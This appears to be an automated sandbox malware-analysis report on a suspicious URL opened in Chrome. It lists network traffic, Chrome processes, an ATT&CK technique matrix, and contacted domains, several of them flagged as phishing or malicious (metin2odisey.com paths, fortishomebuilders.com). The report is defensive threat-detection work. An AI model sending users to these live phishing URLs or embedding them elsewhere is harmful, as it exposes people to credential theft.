Source: chromecache_112.2.dr	String found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/deed.en
Source: chromecache_112.2.dr	String found in binary or memory: https://developer.wikimedia.org
Source: chromecache_112.2.dr	String found in binary or memory: https://donate.wikimedia.org/?wmf_source=donate&wmf_medium=sidebar&wmf_campaign=en.wikipedia
Source: chromecache_75.2.dr	String found in binary or memory: https://fortishomebuilders.com/
Source: chromecache_112.2.dr	String found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement
Source: chromecache_112.2.dr	String found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy
Source: chromecache_112.2.dr	String found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use
Source: chromecache_112.2.dr	String found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct
Source: chromecache_108.2.dr, chromecache_95.2.dr	String found in binary or memory: https://intake-analytics.wikimedia.org
Source: chromecache_108.2.dr, chromecache_95.2.dr	String found in binary or memory: https://intake-analytics.wikimedia.org/v1/events?hasty=true
Source: chromecache_108.2.dr, chromecache_95.2.dr	String found in binary or memory: https://intake-logging.wikimedia.org/v1/events?hasty=true
Source: chromecache_112.2.dr	String found in binary or memory: https://login.wikimedia.org/wiki/Special:CentralAutoLogin/start?useformat=desktop&type=1x1&u
Source: chromecache_78.2.dr	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: chromecache_76.2.dr, chromecache_110.2.dr	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/c/c0/MediaWiki_footer_link_ltr.svg
Source: chromecache_111.2.dr, chromecache_104.2.dr	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/c/c9/Client-server-model.svg/320px-Client-serve
Source: chromecache_111.2.dr, chromecache_104.2.dr	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/c/c9/Client-server-model.svg/500px-Client-serve
Source: chromecache_112.2.dr	String found in binary or memory: https://wikimediafoundation.org/
Source: chromecache_112.2.dr	String found in binary or memory: https://www.mediawiki.org/
Source: chromecache_108.2.dr, chromecache_95.2.dr	String found in binary or memory: https://www.mediawiki.org/w/api.php
Source: chromecache_93.2.dr, chromecache_97.2.dr	String found in binary or memory: https://www.mediawiki.org/wiki/Extension:VisualEditor/Skin_requirements
Source: chromecache_93.2.dr, chromecache_97.2.dr	String found in binary or memory: https://www.mediawiki.org/wiki/Manual:Messages_API#Feature_support_in_JavaScript
Source: chromecache_93.2.dr, chromecache_97.2.dr	String found in binary or memory: https://www.mediawiki.org/wiki/Specs/HTML/2.8.0
Source: chromecache_71.2.dr, chromecache_78.2.dr	String found in binary or memory: https://www.mediawiki.org/wiki/Specs/Summary/1.2.0
Source: chromecache_112.2.dr	String found in binary or memory: https://www.techtarget.com/searchvirtualdesktop/tip/Remote-Desktop-Services-licensing-rules-and-reco
Source: chromecache_112.2.dr	String found in binary or memory: https://www.theregister.com/2020/03/20/surge_in_home_working/
Source: chromecache_82.2.dr, chromecache_101.2.dr	String found in binary or memory: https://www.wikidata.org
Source: chromecache_108.2.dr, chromecache_95.2.dr	String found in binary or memory: https://www.wikidata.org/w/api.php
Source: chromecache_112.2.dr	String found in binary or memory: https://www.wikidata.org/wiki/Special:EntityPage/Q1100998
Source: chromecache_112.2.dr	String found in binary or memory: https://www.wikidata.org/wiki/Special:EntityPage/Q1100998#sitelinks-wikipedia

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: classification engine

Classification label: mal52.win@25/81@34/13

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2140,i,14077100606901217665,11890294858342083006,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dtrnconsulta.com/hnvwk"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2140,i,14077100606901217665,11890294858342083006,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://dtrnconsulta.com/hnvwk	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://developer.wikimedia.org	0%	Avira URL Cloud	safe
https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2145603863:1737058317:VtFr33mDKD2pn-nQny-_tCmIPBAIaigR746xGJkyGW0/903112caee240c7a/PTYT7zyAOgo4VQZL8cUrMiwLdB9mssZcDsY4P22_G_8-1737061628-1.2.1.1-C0fUZxc3UPnEu3f6WwwEhDcPUpw4AqAzQgxfH8xFyAY58K8yPhjKmCmaMr2B7Rig	100%	Avira URL Cloud	phishing
https://dtrnconsulta.com/favicon.ico	0%	Avira URL Cloud	safe
https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/672eb098a9f3/main.js?	100%	Avira URL Cloud	phishing
http://www.msterminalservices.org/articles/Changes-Windows-Server-2008-Terminal-Server-Licensing-Par	0%	Avira URL Cloud	safe
https://metin2odisey.com/cdn-cgi/challenge-platform/scripts/jsd/main.js	100%	Avira URL Cloud	phishing
https://fortishomebuilders.com/	0%	Avira URL Cloud	safe
http://fortishomebuilders.com/favicon.ico	0%	Avira URL Cloud	safe
https://wikimediafoundation.org/	0%	Avira URL Cloud	safe
http://www.mslicensing.fr/theorie/core-cal-vs-enteeprise-cal	0%	Avira URL Cloud	safe
https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=903112caee240c7a	100%	Avira URL Cloud	phishing
https://metin2odisey.com/favicon.ico	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fortishomebuilders.com	66.63.187.232	true	true	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	high
challenges.cloudflare.com	104.18.94.41	true	false	high
www.google.com	142.250.184.228	true	false	high
metin2odisey.com	104.21.24.140	true	false	high
dyna.wikimedia.org	185.15.59.224	true	false	high
dtrnconsulta.com	83.217.208.10	true	false	unknown
href.li	192.0.78.27	true	false	high
en.wikipedia.org	unknown	unknown	false	high
meta.wikimedia.org	unknown	unknown	false	high
login.wikimedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://metin2odisey.com/verytrue/	true		unknown
http://fortishomebuilders.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3djd5/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/new/normal/auto/	false		high
https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2145603863:1737058317:VtFr33mDKD2pn-nQny-_tCmIPBAIaigR746xGJkyGW0/903112caee240c7a/PTYT7zyAOgo4VQZL8cUrMiwLdB9mssZcDsY4P22_G_8-1737061628-1.2.1.1-C0fUZxc3UPnEu3f6WwwEhDcPUpw4AqAzQgxfH8xFyAY58K8yPhjKmCmaMr2B7Rig	false	Avira URL Cloud: phishing	unknown
https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/672eb098a9f3/main.js?	false	Avira URL Cloud: phishing	unknown
https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1td88	false		high
https://en.wikipedia.org/static/favicon/wikipedia.ico	false		high
https://en.wikipedia.org/wiki/Client_access_license	false		high
https://login.wikimedia.org/wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script	false		high
https://en.wikipedia.org/api/rest_v1/page/summary/Server_software	false		high
https://en.wikipedia.org/w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7u	false		high
https://metin2odisey.com/cdn-cgi/challenge-platform/scripts/jsd/main.js	false	Avira URL Cloud: phishing	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/903112e0daeb0c84/1737061634198/9bc8e4a6714402bad0f9db6672079c2e5fe4b6d9be67268acd6c9770ef20e617/rF1jR65NlXmLXQJ	false		high
https://en.wikipedia.org/wiki/Special:CentralAutoLogin/start?type=script	false		high
https://en.wikipedia.org/w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64d	false		high
https://a.nel.cloudflare.com/report/v4?s=Eea3yg8G1o3p%2FBHr78EasUsEuAT0m2SIm%2Fs7gUsZsvxj6hPNk3Auf6CJdrqnJaeMF5vOY8JlddFg4rmIVg%2F8hq%2Bl%2FBxuy4C8%2BZJDKM%2BCrTBn2cfCKeh6IlUxMVXRtcK9rWdz	false		high
https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=zjugj	false		high
https://en.wikipedia.org/w/load.php?lang=en&modules=site.styles&only=styles&skin=vector-2022	false		high
http://fortishomebuilders.com/	false		unknown
https://fortishomebuilders.com/	true	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=jHOZkjl%2BDuqX42ieMVf1XtGb678HBi%2FzC9UCVBUieSOYMCEFaeNzwwMsQlW1vBBZk4jCAl9Hb0LjWkf6qzkaTdICg3XEg0TjVofL3A34lqJy4zFdksQ0KTGtbuebwLLCKf8j	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2031134020:1737058434:c-z86qu5zQeSlhcF_YB19pGLXXUhcvHTmjc4CYkbnEw/903112e0daeb0c84/DvnHb7CL7RSAt_vpM7SLK34ur5KjtWnxycs6RyWN8qE-1737061632-1.1.1.1-k9XgdELB3bNTs8JW_P6fjLXB5bNHz2is_tzzqacb5ysIDE2msYnPrQn8ZVXg9hZy	false		high
https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022	false		high
https://dtrnconsulta.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=zjugj	false		high
https://en.wikipedia.org/w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1ezz7	false		high
https://en.wikipedia.org/api/rest_v1/page/summary/Server_(computing)	false		high
https://href.li/?https://en.wikipedia.org/wiki/Client_access_license	false		high
https://en.wikipedia.org/static/images/mobile/copyright/wikipedia-wordmark-en.svg	false		high
https://en.wikipedia.org/static/images/mobile/copyright/wikipedia-tagline-en.svg	false		high
https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=zjugj	false		high
https://en.wikipedia.org/w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1wwpp	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1	false		high
